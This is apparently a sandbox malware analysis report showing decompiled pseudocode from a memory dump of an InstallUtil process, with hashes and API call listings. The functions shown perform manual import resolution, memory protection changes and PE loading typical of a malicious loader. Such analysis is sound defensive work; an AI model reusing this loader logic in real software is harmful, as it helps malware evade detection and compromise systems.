                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1469625949-0
                                                            • Opcode ID: ea78442fbb6f8df02cfb9288583b02d0742626e1adf08fd53ab95bf3c78785da
                                                            • Instruction ID: fe3dbcecb8e3adfab23722be9ea9b663c21ebef7aa247796aadf6149567b5b35
                                                            • Opcode Fuzzy Hash: ea78442fbb6f8df02cfb9288583b02d0742626e1adf08fd53ab95bf3c78785da
                                                            • Instruction Fuzzy Hash: AD216271800209DFCB18DF85C985ABAF7F4FF48345F01446AD242E7559E3B8AA69CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph
                                                            C-Code - Quality: 100%
                                                            			E00401EA1(void* __edi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr* _v12;
                                                            				_Unknown_base(*)()** _v16;
                                                            				signed int _v20;
                                                            				signed short _v24;
                                                            				struct HINSTANCE__* _v28;
                                                            				intOrPtr _t43;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr _t46;
                                                            				struct HINSTANCE__* _t47;
                                                            				intOrPtr* _t49;
                                                            				intOrPtr _t50;
                                                            				signed short _t51;
                                                            				_Unknown_base(*)()* _t53;
                                                            				CHAR* _t54;
                                                            				_Unknown_base(*)()* _t55;
                                                            				void* _t58;
                                                            				signed int _t59;
                                                            				_Unknown_base(*)()* _t60;
                                                            				intOrPtr _t61;
                                                            				intOrPtr _t65;
                                                            				signed int _t68;
                                                            				void* _t69;
                                                            				CHAR* _t71;
                                                            				signed short* _t73;
                                                            
                                                            				_t69 = __edi;
                                                            				_v20 = _v20 & 0x00000000;
                                                            				_t59 =  *0x403180;
                                                            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                            				if(_t43 != 0) {
                                                            					_t45 = _t43 + __edi;
                                                            					_v12 = _t45;
                                                            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                            					if(_t46 != 0) {
                                                            						while(1) {
                                                            							_t71 = _t46 + _t69;
                                                            							_t47 = LoadLibraryA(_t71); // executed
                                                            							_v28 = _t47;
                                                            							if(_t47 == 0) {
                                                            								break;
                                                            							}
                                                            							_v24 = _v24 & 0x00000000;
                                                            							 *_t71 = _t59 - 0x69b25f44;
                                                            							_t49 = _v12;
                                                            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                            							_t50 =  *_t49;
                                                            							if(_t50 != 0) {
                                                            								L6:
                                                            								_t73 = _t50 + _t69;
                                                            								_v16 = _t61 + _t69;
                                                            								while(1) {
                                                            									_t51 =  *_t73;
                                                            									if(_t51 == 0) {
                                                            										break;
                                                            									}
                                                            									if(__eflags < 0) {
                                                            										__eflags = _t51 - _t69;
                                                            										if(_t51 < _t69) {
                                                            											L12:
                                                            											_t21 =  &_v8;
                                                            											 *_t21 = _v8 & 0x00000000;
                                                            											__eflags =  *_t21;
                                                            											_v24 =  *_t73 & 0x0000ffff;
                                                            										} else {
                                                            											_t65 = _a4;
                                                            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                            												goto L12;
                                                            											} else {
                                                            												goto L11;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										_t51 = _t51 + _t69;
                                                            										L11:
                                                            										_v8 = _t51;
                                                            									}
                                                            									_t53 = _v8;
                                                            									__eflags = _t53;
                                                            									if(_t53 == 0) {
                                                            										_t54 = _v24 & 0x0000ffff;
                                                            									} else {
                                                            										_t54 = _t53 + 2;
                                                            									}
                                                            									_t55 = GetProcAddress(_v28, _t54);
                                                            									__eflags = _t55;
                                                            									if(__eflags == 0) {
                                                            										_v20 = _t59 - 0x69b25ec5;
                                                            									} else {
                                                            										_t68 = _v8;
                                                            										__eflags = _t68;
                                                            										if(_t68 != 0) {
                                                            											 *_t68 = _t59 - 0x69b25f44;
                                                            										}
                                                            										 *_v16 = _t55;
                                                            										_t58 = 0x593682f4 + _t59 * 4;
                                                            										_t73 = _t73 + _t58;
                                                            										_t32 =  &_v16;
                                                            										 *_t32 = _v16 + _t58;
                                                            										__eflags =  *_t32;
                                                            										continue;
                                                            									}
                                                            									goto L23;
                                                            								}
                                                            							} else {
                                                            								_t50 = _t61;
                                                            								if(_t61 != 0) {
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            							L23:
                                                            							_v12 = _v12 + 0x14;
                                                            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                            							if(_t46 != 0) {
                                                            								continue;
                                                            							} else {
                                                            							}
                                                            							L26:
                                                            							goto L27;
                                                            						}
                                                            						_t60 = _t59 + 0x964da13a;
                                                            						__eflags = _t60;
                                                            						_v20 = _t60;
                                                            						goto L26;
                                                            					}
                                                            				}
                                                            				L27:
                                                            				return _v20;
                                                            			}

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401ED9
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00401F4B
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 2574300362-0
                                                            • Opcode ID: b08856e33ae3e4837c86fa3f6296e1e38edeba7740de660ba33458cc8f5fd904
                                                            • Instruction ID: 951c655037779ae1b66cd19760bdbfc8ab9dfec7e1627345683cfc52122a3d54
                                                            • Opcode Fuzzy Hash: b08856e33ae3e4837c86fa3f6296e1e38edeba7740de660ba33458cc8f5fd904
                                                            • Instruction Fuzzy Hash: B43117B1A002069FDB14CF59C884AAEB7F4BF44355B24417AE901FB3A0E778DA41CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph
                                                            C-Code - Quality: 100%
                                                            			E00401A98() {
                                                            				char _v16;
                                                            				intOrPtr _v28;
                                                            				void _v32;
                                                            				void* _v36;
                                                            				intOrPtr _t15;
                                                            				void* _t16;
                                                            				long _t25;
                                                            				int _t26;
                                                            				void* _t30;
                                                            				intOrPtr* _t32;
                                                            				signed int _t36;
                                                            				intOrPtr _t39;
                                                            
                                                            				_t15 =  *0x403184;
                                                            				if( *0x40316c > 5) {
                                                            					_t16 = _t15 + 0x4040f9;
                                                            				} else {
                                                            					_t16 = _t15 + 0x4040b1;
                                                            				}
                                                            				E00401E35(_t16, _t16);
                                                            				_t36 = 6;
                                                            				memset( &_v32, 0, _t36 << 2);
                                                            				if(E00401479( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548) == 0) {
                                                            					_t25 = 0xb;
                                                            				} else {
                                                            					_t26 = lstrlenW( *0x403178);
                                                            					_t8 = _t26 + 2; // 0x2
                                                            					_t11 = _t26 + _t8 + 8; // 0xa
                                                            					_t30 = E00401B52(_t39, _t11,  &_v32,  &_v36); // executed
                                                            					if(_t30 == 0) {
                                                            						_t40 =  *0x403178;
                                                            						_t32 = _v36;
                                                            						 *_t32 = 0;
                                                            						if( *0x403178 == 0) {
                                                            							 *((short*)(_t32 + 4)) = 0;
                                                            						} else {
                                                            							E00401FAC(_t45, _t40, _t32 + 4);
                                                            						}
                                                            					}
                                                            					_t25 = E004011C1(_v28); // executed
                                                            				}
                                                            				ExitThread(_t25);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ExitThreadlstrlen
                                                            • String ID:
                                                            • API String ID: 2636182767-0
                                                            • Opcode ID: 02c2250341f6d03a27af8a08f07ccbf7dfa604ab44a28f084247d4b31e8d20fe
                                                            • Instruction ID: 14069ec6a0d4c6b1db03676319b93d70d9afb0d21d5a2f796d034618d778d09c
                                                            • Opcode Fuzzy Hash: 02c2250341f6d03a27af8a08f07ccbf7dfa604ab44a28f084247d4b31e8d20fe
                                                            • Instruction Fuzzy Hash: 6611BE71504201ABE711DFA5CD49E5777ECAB48304F04453BB641F72B1EB38EA058B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 37%
                                                            			E00401E35(void* __eax, intOrPtr _a4) {
                                                            
                                                            				 *0x403190 =  *0x403190 & 0x00000000;
                                                            				_push(0);
                                                            				_push(0x40318c);
                                                            				_push(1);
                                                            				_push(_a4);
                                                            				 *0x403188 = 0xc; // executed
                                                            				L004013FA(); // executed
                                                            				return __eax;
                                                            			}

                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401AC5,00000001,0040318C,00000000), ref: 00401E53
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: DescriptorSecurity$ConvertString
                                                            • String ID:
                                                            • API String ID: 3907675253-0
                                                            • Opcode ID: b5b617994087af0d0ea66c4f0b84e660e0c61463ba07f072955e03b395522a9a
                                                            • Instruction ID: c63cd9b430faf93bbeedc2284bbc4f3b30bcb02564c30e5c94284cdbba91c459
                                                            • Opcode Fuzzy Hash: b5b617994087af0d0ea66c4f0b84e660e0c61463ba07f072955e03b395522a9a
                                                            • Instruction Fuzzy Hash: E1C04C74140300B6F6109F409D4AF057E55B75870AF60052EBA04391E1C3F95155952D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 86%
                                                            			E004011C1(void* __eax) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				void* __edi;
                                                            				void* _t18;
                                                            				long _t24;
                                                            				long _t26;
                                                            				long _t29;
                                                            				intOrPtr _t40;
                                                            				void* _t41;
                                                            				intOrPtr* _t42;
                                                            				void* _t44;
                                                            
                                                            				_t41 = __eax;
                                                            				_t16 =  *0x403180;
                                                            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
                                                            				_t18 = E004012D3( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                            				if(_t18 != 0) {
                                                            					_t29 = 8;
                                                            					goto L8;
                                                            				} else {
                                                            					_t40 = _v8;
                                                            					_t29 = E0040113C(_t33, _t40, _t41);
                                                            					if(_t29 == 0) {
                                                            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                            						_t24 = E00401EA1(_t40, _t44); // executed
                                                            						_t29 = _t24;
                                                            						if(_t29 == 0) {
                                                            							_t26 = E0040105A(_t44, _t40); // executed
                                                            							_t29 = _t26;
                                                            							if(_t29 == 0) {
                                                            								_push(_t26);
                                                            								_push(1);
                                                            								_push(_t40);
                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                            									_t29 = GetLastError();
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					_t42 = _v12;
                                                            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                            					E00401265(_t42);
                                                            					L8:
                                                            					return _t29;
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 004012D3: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004011FD,?,?,?,?,?,00000002,?,?), ref: 004012F7
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 00401319
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 0040132F
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 00401345
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 0040135B
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 00401371
                                                              • Part of subcall function 00401EA1: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401ED9
                                                              • Part of subcall function 0040105A: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401093
                                                              • Part of subcall function 0040105A: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401108
                                                              • Part of subcall function 0040105A: GetLastError.KERNEL32 ref: 0040110E
                                                            • GetLastError.KERNEL32(?,?), ref: 0040123F
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                                                            • String ID:
                                                            • API String ID: 3135819546-0
                                                            • Opcode ID: a638a532b57f06340b17208a2ea5240cace7122cc206e8ca70d164770d418078
                                                            • Instruction ID: 2b549204dcde533aa1ddfd6f33501cb63817433826d10048fe320036ebb960fa
                                                            • Opcode Fuzzy Hash: a638a532b57f06340b17208a2ea5240cace7122cc206e8ca70d164770d418078
                                                            • Instruction Fuzzy Hash: 9711CB36600705ABD721AB95CC80DAB77BCAF89318704017EEA02F7691DB75ED068794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 100%
                                                            			E00401400() {
                                                            				void* _t1;
                                                            				unsigned int _t3;
                                                            				void* _t4;
                                                            				long _t5;
                                                            				void* _t6;
                                                            				intOrPtr _t10;
                                                            				void* _t14;
                                                            
                                                            				_t10 =  *0x403170;
                                                            				_t1 = CreateEventA(0, 1, 0, 0);
                                                            				 *0x40317c = _t1;
                                                            				if(_t1 == 0) {
                                                            					return GetLastError();
                                                            				}
                                                            				_t3 = GetVersion();
                                                            				if(_t3 != 5) {
                                                            					L4:
                                                            					if(_t14 <= 0) {
                                                            						_t4 = 0x32;
                                                            						return _t4;
                                                            					} else {
                                                            						goto L5;
                                                            					}
                                                            				} else {
                                                            					if(_t3 >> 8 > 0) {
                                                            						L5:
                                                            						 *0x40316c = _t3;
                                                            						_t5 = GetCurrentProcessId();
                                                            						 *0x403168 = _t5;
                                                            						 *0x403170 = _t10;
                                                            						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                            						 *0x403164 = _t6;
                                                            						if(_t6 == 0) {
                                                            							 *0x403164 =  *0x403164 | 0xffffffff;
                                                            						}
                                                            						return 0;
                                                            					} else {
                                                            						_t14 = _t3 - _t3;
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004015CC), ref: 0040140F
                                                            • GetVersion.KERNEL32 ref: 0040141E
                                                            • GetCurrentProcessId.KERNEL32 ref: 0040143A
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401453
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                            • String ID:
                                                            • API String ID: 845504543-0
                                                            • Opcode ID: 7a3fd3bc2feab416e398d136e547c0e7dcbd23d15830545ffe2416a0c629e091
                                                            • Instruction ID: dd5f4ea68d3ad7174de981b0e01852059bc69c4482632bbefd262180a3999ea5
                                                            • Opcode Fuzzy Hash: 7a3fd3bc2feab416e398d136e547c0e7dcbd23d15830545ffe2416a0c629e091
                                                            • Instruction Fuzzy Hash: 41F03C306803119BE7205F78BF19B563F68A709712F440036E651FA2F0D7B48A42CB4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%